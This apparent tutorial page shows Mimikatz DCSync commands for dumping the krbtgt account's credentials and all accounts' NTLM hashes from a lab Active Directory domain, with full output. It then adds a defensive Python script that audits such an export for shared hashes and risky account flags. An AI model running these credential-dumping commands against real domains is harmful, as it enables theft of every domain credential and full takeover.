# Using Mimikatz

A DCSync can be run to extract the information of one specific user or of all users:

## <mark style="color:red;">For a specific user:</mark>

```powershell
PS C:\> .\mimikatz.exe

mimikatz # lsadump::dcsync /domain:spartancybersec.corp /user:krbtgt
[DC] 'spartancybersec.corp' will be the domain
[DC] 'First-DC.spartancybersec.corp' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/19/2022 11:34:18 PM
Object Security ID   : S-1-5-21-1861162130-2580302541-221646211-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: b44daa015f201fa31126895ebbcbbcab
    ntlm- 0: b44daa015f201fa31126895ebbcbbcab
    lm  - 0: 216e51b46d2f3117bfb04f5b1aeef460
```

## <mark style="color:red;">To exfiltrate all users in the domain:</mark>

```powershell
mimikatz # lsadump::dcsync /domain:spartancybersec.corp /all /csv
[DC] 'spartancybersec.corp' will be the domain
[DC] 'First-DC.spartancybersec.corp' will be the DC server
[DC] Exporting domain 'spartancybersec.corp'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1116    Suspicious-PC$  d566c257631be77cde24694488ef337d        4096
502     krbtgt  b44daa015f201fa31126895ebbcbbcab        514
500     Administrator   c90fb8ae170b856da331fa40d5c11769        512
1009    FIRST-DC$       9e24232fd09fa4eb1fdf798597550a40        532480
1008    admin   64fbae31cc352fc26af97cbdef151e03        66048
1126    clearpass.user  64fbae31cc352fc26af97cbdef151e03        66048
1120    compwrite.user  64fbae31cc352fc26af97cbdef151e03        66048
1115    constrained.user        64fbae31cc352fc26af97cbdef151e03        66048
1113    dnsadmin.user   64fbae31cc352fc26af97cbdef151e03        66048
1121    gpowrite.user   64fbae31cc352fc26af97cbdef151e03        66048
1123    groupwrite.user 64fbae31cc352fc26af97cbdef151e03        66048
1122    lapsread.user   64fbae31cc352fc26af97cbdef151e03        66048
1125    readgmsa.user   64fbae31cc352fc26af97cbdef151e03        66048
1112    regular.user    64fbae31cc352fc26af97cbdef151e03        66048
1127    roast.user      64fbae31cc352fc26af97cbdef151e03        66048
1114    unconstrained.user      64fbae31cc352fc26af97cbdef151e03        590336
1118    userall.user    64fbae31cc352fc26af97cbdef151e03        66048
1117    userwrite.user  64fbae31cc352fc26af97cbdef151e03        66048
1124    writedacldc.user        64fbae31cc352fc26af97cbdef151e03        66048
1129    USER-SERVER$    dadef894e564c991a5a5714e0a7efc67        4096
1131    WEBSERVER$      449c5f226aff8a2af42ac07ebaf901cb        4096
1130    adminwebserver  64fbae31cc352fc26af97cbdef151e03        66048
1128    asrep.user      64fbae31cc352fc26af97cbdef151e03        4260352
1119    VIKINGSCYBERSEC$        a9e60b71ecaab835b49ec6a56ca99af5        2080
```
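Read from the defender's side, the `/all /csv` output above has four columns: RID, account name, NT hash and the decimal `userAccountControl` value. The following is an added example, not part of the original page or of Mimikatz: it decodes that last column and groups accounts that share an NT hash, which is what a password audit of such an export would report. The sample rows, account names and hash values are constructed, and the function names are hypothetical.

```python
from collections import defaultdict

# userAccountControl bits, as documented by Microsoft
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
# Flags that are worth an audit finding on their own
RISKY = {"PASSWD_NOTREQD", "DONT_EXPIRE_PASSWORD",
         "TRUSTED_FOR_DELEGATION", "DONT_REQ_PREAUTH"}

def decode_uac(value):
    """Return the flag names set in a decimal userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def parse_rows(text):
    """Keep only data rows (RID, name, 32-char NT hash, UAC); skip banner lines."""
    rows = []
    for line in text.splitlines():
        p = line.split()
        if len(p) == 4 and p[0].isdigit() and len(p[2]) == 32 and p[3].isdigit():
            rows.append({"rid": int(p[0]), "name": p[1], "nt": p[2].lower(),
                         "flags": decode_uac(int(p[3]))})
    return rows

def audit(rows):
    """Return (groups of accounts sharing an NT hash, risky flags per account)."""
    by_hash = defaultdict(list)
    for r in rows:
        by_hash[r["nt"]].append(r["name"])
    shared = sorted(sorted(n) for n in by_hash.values() if len(n) > 1)
    risky = {r["name"]: sorted(RISKY & set(r["flags"]))
             for r in rows if RISKY & set(r["flags"])}
    return shared, risky

# Constructed sample in the same column layout; hashes are placeholders
SAMPLE = """[DC] Exporting domain 'example.test'
502     krbtgt  00000000000000000000000000000001        514
1001    HOST01$ 00000000000000000000000000000002        4096
1002    alice   00000000000000000000000000000003        66048
1003    bob     00000000000000000000000000000003        66048
1004    svc.legacy      00000000000000000000000000000003        4260352
1005    svc.deleg       00000000000000000000000000000004        590336
"""
```

Applied to the values on this page, the same decoding reads 4260352 as a normal account with a non-expiring password and Kerberos pre-authentication disabled, and 590336 as one trusted for delegation.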


